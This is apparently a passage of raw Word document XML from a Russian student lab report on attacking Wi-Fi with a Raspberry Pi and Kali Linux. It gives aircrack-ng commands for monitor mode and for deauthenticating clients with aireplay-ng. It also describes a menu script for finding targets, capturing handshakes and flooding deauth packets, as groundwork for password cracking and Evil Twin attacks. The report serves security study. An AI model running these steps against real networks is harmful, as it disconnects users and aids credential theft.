        <w:t xml:space="preserve"> (необходимо в консоли прописать команду </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">airmon-ng start</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> “название сетевого интерфейса”). После включения режима мониторинга остаётся лишь запустить любой сниффер, например, Wireshark, который позволяет перехватывать и анализировать весь трафик, проходящий между клиентом и точкой доступа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E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7">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E8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.gjdgxs" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E9">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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работы было использовано следующее оборудование и ПО:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="57" w:before="57"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Одноплатный компьютер Raspberry Pi (в нашем случае использовалась версия 3B);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="57" w:before="57"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Внешний Wi-Fi адаптер для дистанционного управления устройством;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="57" w:before="57"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Kali Linux RaspberryPi OS;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="57" w:before="57"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Периферийные устройства и карта памяти;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="57" w:before="57"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утилит </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aircrack-ng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F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="57" w:before="57"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Утилита для сбора и прослушки сетевого трафика: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="57" w:before="57"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3; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F1">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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и любой компьютер Raspberry Pi нуждается в операционной системе. Ввиду того, что официальные версии операционных систем для Raspberry Pi не позволяют переводить встроенный Wi-Fi адаптер в режим мониторинга, нами была установлена модифицированная версия этой системы. Ее использование обусловлено еще и тем, что купленный нами внешний Wi-Fi адаптер оказался непригодным для перевода в режим мониторинга.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F2">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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накопителем данных в Raspberry Pi является MicroSDHC карта, поэтому установка ОС имеет свою специфику. Ввиду использования готового образа системы, установка нам не потребовалась.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F3">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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шагом является установка драйверов для Wi-Fi адаптера. Как упоминалось выше, его ревизия отличается от совместимой с режимом мониторинга, поэтому для корректной установки понадобились некоторые правки в настройках системы. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F4">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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установки необходимого ПО можно приступать к основной части работы. Так как для питания микрокомпьютера используется съемный накопитель энергии, с точки зрения удобства управления и сохранения запаса питания целесообразно не использовать графический интерфейс системы, а управлять ей удаленно. В нашем случае был использован протокол </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh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5">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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26669</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6120130" cy="1696720"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="0" distR="0"/>
            <wp:docPr id="3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20130" cy="1696720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F6">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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необходимо убедиться в том, что система видит оба Wi-Fi адаптера (внешний и внутренний) посредством команды </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> На выводе видим два адаптера: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wlan1</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wlan0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. В процессе работы имена интерфейсов поменяются местами, поэтому в качестве интерфейса для мониторинга будет использоваться </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wlan0mon</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для перевода сетевой карты в режим мониторинга воспользуемся утилитой </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">airmon-ng</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сначала узнаем, к какому интерфейсу привязан наш внутренний адаптер (его мы и будем переводить в режим мониторинга) при помощи </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo airmon-ng:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F7">
      <w:pPr>
        <w:spacing w:after="57" w:before="57" w:line="360" w:lineRule="auto"/>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-633</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5438775" cy="1352550"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="0" distR="0"/>
            <wp:docPr id="3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38775" cy="1352550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F8">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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after="57" w:before="57"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A">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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B">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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C">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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Видим, что внешний адаптер привязан к интерфейсу </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wlan0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, а внутренний — к </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wlan1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D">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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Переведем теперь </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wlan1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> в режим мониторинга командой</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo airmon-ng start wlan1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003FE">
      <w:pPr>
        <w:spacing w:after="57" w:before="57" w:line="360" w:lineRule="auto"/>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842895"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="0" distR="0"/>
            <wp:docPr id="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0130" cy="2842895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003FF">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Получаем предупреждение о том, что следующие процессы (номера 384, 463 и 551) могут помешать работе адаптера в режиме мониторинга, однако в нашей ситуации мы пока не будем их убивать, так как иначе отключится и внешний Wi-Fi адаптер, через который производится управление системой. Внизу вывода видим, что для </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wlan1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> был включен режим мониторинга и теперь мы к этому интерфейсу должны обращаться по имени </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wlan1mon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0">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Практическая часть работы была разделена между нами на 3 части: каждый из участников команды выполнял свою задачу. Моей задачей было изучение основ деаунтификации пользователей и написание скрипта, позволяющего осуществлять несколько возможных ее режимов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000401">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Wifi Deauthentication Attack – это вид беспроводной атаки, в которой атакующий рассылает death пакеты (деаунтификации) в сеть Wifi, что приводит к отключению сети подключенных устройств. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000402">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Большинство маршрутизаторов (Access Point, точек доступа), используемых сегодня, поддерживают протокол Wifi сетей IEEE 802.11. Его особенностью является возможность санкционированной отправки пакетов (кадров) деаунтификации. Протокол не требует какого-либо шифрования для такого пакета, даже если сеанс был установлен с использованием Wired Equivalent Privacy (WEP). Использование шифрования ограничено только «полезными» данными и не применяется к заголовкам кадров, поскольку эти данные необходимы для нормальной работы трафика в 802.11.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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Чаще всего деаунтификация используется для осуществления двух векторов атак на беспроводные сети:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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захват рукопожатий (handshake);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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подключение к фейковой точки доступа (Evil Twin Attack).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000040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технической точки зрения рукопожатие в беспроводных сетях – это обмен информацией между точкой доступа и клиентом в момент, когда он подключается к ней. Захват рукопожатий состоит в перехвате такой информации путем принуждения клиента к повторному подключению через деаунтификацию его устройства. Полученные данные в последствии могут использоваться для взлома паролей или иных целей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000040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 из основных распространенных целей деаутентификации – заставить клиентов подключаться к поддельной точке доступа, которая затем может использоваться для захвата сетевых пакетов, передаваемых между клиентом и точкой достуав. Злоумышленник проводит атаку деаутентификации целевого клиента, отключая его от своей текущей сети, тем самым позволяя клиенту автоматически подключаться к точке доступа двойника.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000408">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9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.30j0zll" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Осуществление деаунтификации пользователей</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000040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осуществления деаунтификации устройств использовалась утилита aireplay-ng поставляемая программным пакетом airecrack-ng. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000040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деаунтификацией устройства необходимо узнать его мак-адресс и мак-адрес роутера, к которому оно подключено. С этой целью можно воспользоваться средствами для захвата пакетов airdump. Для этого в режиме мониторинга вводим команду на сканирование доступных сетей в терминале kali. В результате получаем данные Probe Request, рассылаемых расположенных вблизи устройств.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000040C">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скриншоте ниже видим, какие на данный момент доступны Wifi точки и устройства.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000040D">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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95975" cy="2628900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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8959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spacing w:after="57" w:before="57"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Посылаем на конкретный роутеру запросы деаутентификации пользователя командой sudo aireplay-ng -0 10 -a «MAC-адрес роутера» -c «MAC-адрес пользователя, если он известен» wlan1mon, где -0 10 означает отправку 10 запросов, -а — мак адрес роутера, -с — мак адрес пользователя. В данном случае были отправлено через беспроводной интерфейс wlan1mon 10 deauth пакетов на отключения устройства 14:4F:8A:A8:4D:A5 подключенному к роутеру B0:BE:76:54:3D:E8.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000410">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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86450" cy="1104900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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864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spacing w:after="57" w:before="57"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2">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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может быть осуществлена деаунтификация конкретного устройства с целью подключения к Fake Access Point (подробнее об ее создании см. другие отчеты).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000413">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упростить процесс использования утилит, поставляемых пакетом aircrack, совместно был создан скрипт со следующим пользовательским интерфейсом:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000414">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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940425" cy="1445351"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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0425" cy="1445351"/>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представленном выше скрипте представлена информация об авторах. В общем случае скрипт предоставляет следующую функциональность.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000416">
      <w:pPr>
        <w:spacing w:after="57" w:before="57" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="4238625" cy="1628775"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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386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spacing w:after="57" w:before="57"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Мною были реализованы опции: [0], [1], [2] и [4].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000418">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«set up interface» считывает беспроводной интерфейс с включенным режимом мониторинга. При необходимости она позволяет также его сменить.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000419">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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43425" cy="971550"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="31" name="image5.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image5.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="17072" l="417" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="45434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57"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«find the target» осуществляет поиск устройств по близости с использованием airdump, интерфейс используется установленный через option0.</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57"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127223" cy="852879"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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27223" cy="852879"/>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«hone in on target» осуществляет перехват пакетов для конкретного роутера (ussid – макс адресс роутером) с прослушиванием указанного канала. Захваченные пакеты пишутся в файлы и могут в дальнейшем использоваться для анализа. </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57" w:before="57"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199621" cy="3323296"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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621" cy="3323296"/>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«deauth the target» реализует деаунтификацию устройств. Предоставляет два типа деаунтификации:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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57"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широковещательная рассылка 100 deauth пакетов на указанный мак-адрес точки доступа(bssid);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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7"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рассылка deauth пакетов с указанием специфических опций.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000421">
      <w:pPr>
